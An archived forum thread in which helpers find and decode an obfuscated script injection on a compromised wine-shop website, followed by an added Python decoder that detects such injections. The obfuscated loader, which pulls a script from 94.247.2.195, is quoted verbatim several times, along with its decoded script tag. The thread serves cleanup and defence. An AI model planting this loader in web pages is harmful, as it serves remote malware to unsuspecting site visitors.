Author Topic: haakwine.com compromised  (Read 29924 times)

April 16, 2009, 12:32:59 pm

gabbafam

Hi, I am a novice user that is having the malicious site 94.247.2.195 blocked every time I access one website, www.haakwine.com. I did a Yahoo search on 94.247.2.195 and found this malware domain list and forum. I don't know if you are the right person to post a reply to, but I am really wanting to find out how to clean this off this website, because I am the website updater and don't know why it is doing this. Can you offer any help whatsoever? I would be greatly indebted to you.
I think you could be right :( ..... the following is the uncompressed output from the PDF;

/edit

MysteryFCM: Disabled link and removed code from quoted post. Split and moved to compromised servers forum

April 16, 2009, 12:39:32 pm
Reply #1

MysteryFCM

I've checked the site you referenced and cannot find anything suspicious. Is this the site you are having difficulty with?

/edit

Nevermind, found it. The code is at the bottom of mm_menu.js (disable this file or replace it with a clean copy);

Code:
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
This decodes to;

Code:
<script src=//94.247.2.195/jquery.js></script>
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
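A decoder for the injection quoted above, added here as an example (it is not code from the thread or from hpHosts): it locates document.write(unescape('…').replace(/…/g,"")) constructs in a JavaScript file, replays the same unescape-then-strip steps offline, and reports the remote script source so an administrator can flag and clean the file without loading it in a browser. The sample input is the line quoted from mm_menu.js; the is_suspicious helper and its trusted_hosts list are my own additions.

```python
import re
from urllib.parse import unquote

# Injected line exactly as quoted from mm_menu.js in the thread above.
SAMPLE_JS = (
    "document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI"
    "%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E')"
    ".replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,\"\"));"
)

# Shape of the injection: document.write(unescape('<payload>').replace(/<junk tokens>/g, ""))
INJECTION = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*'([^']*)'\s*\)"
    r"\s*\.replace\s*\(\s*/([^/]+)/g\s*,\s*(?:\"\"|'')\s*\)\s*\)"
)

def js_unescape(s):
    """Mimic JavaScript unescape(): %XX bytes plus the %uXXXX form urllib does not know."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

def deobfuscate(js_text):
    """Return [(decoded_html, script_src)] for every injection found in js_text."""
    findings = []
    for payload, junk_regex in INJECTION.findall(js_text):
        # Same two steps the browser would run: unescape, then strip the junk tokens.
        decoded = re.sub(junk_regex, "", js_unescape(payload))
        m = re.search(r"<script[^>]*\ssrc=['\"]?([^'\"\s>]+)", decoded, re.I)
        findings.append((decoded, m.group(1) if m else None))
    return findings

def is_suspicious(js_text, trusted_hosts=()):
    """True if any decoded injection loads a script from a host not in trusted_hosts (my addition)."""
    for _, src in deobfuscate(js_text):
        host = re.sub(r"^(?:https?:)?//", "", src or "").split("/")[0]
        if src is None or host not in trusted_hosts:
            return True
    return False

if __name__ == "__main__":
    for html, src in deobfuscate(SAMPLE_JS):
        print("decoded:", html)
        print("remote script:", src)
    print("suspicious:", is_suspicious(SAMPLE_JS, trusted_hosts=("www.haakwine.com",)))
```

The same decoder handles the HTML-comment-wrapped copy shown in the next reply, since the surrounding `<!-- -->` is ignored.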

April 16, 2009, 12:43:36 pm
Reply #2

GmG

There's a malware script in mm_menu.js

Code:
<!--
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
 -->

April 16, 2009, 12:45:27 pm
Reply #3

MysteryFCM

heh yep, updated my post whilst you were posting ....

April 16, 2009, 12:47:25 pm
Reply #4

MysteryFCM

Script is also present in;

http://www.haakwine.com/Scripts/AC_RunActiveContent.js

April 16, 2009, 01:11:28 pm
Reply #5

SysAdMini

Ruining the bad guy's day

April 16, 2009, 03:03:39 pm
Reply #6

gabbafam

I wished I knew all you all know on this forum. I am sure this is a stupid question for you, but "how do you disable a file?" Thank you so much.

April 16, 2009, 03:13:31 pm
Reply #7

RS-232

By "disable", it simply means removing the code posted above from the html/php files where it is present...

Quote
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw

April 16, 2009, 11:11:18 pm
Reply #8

RS-232
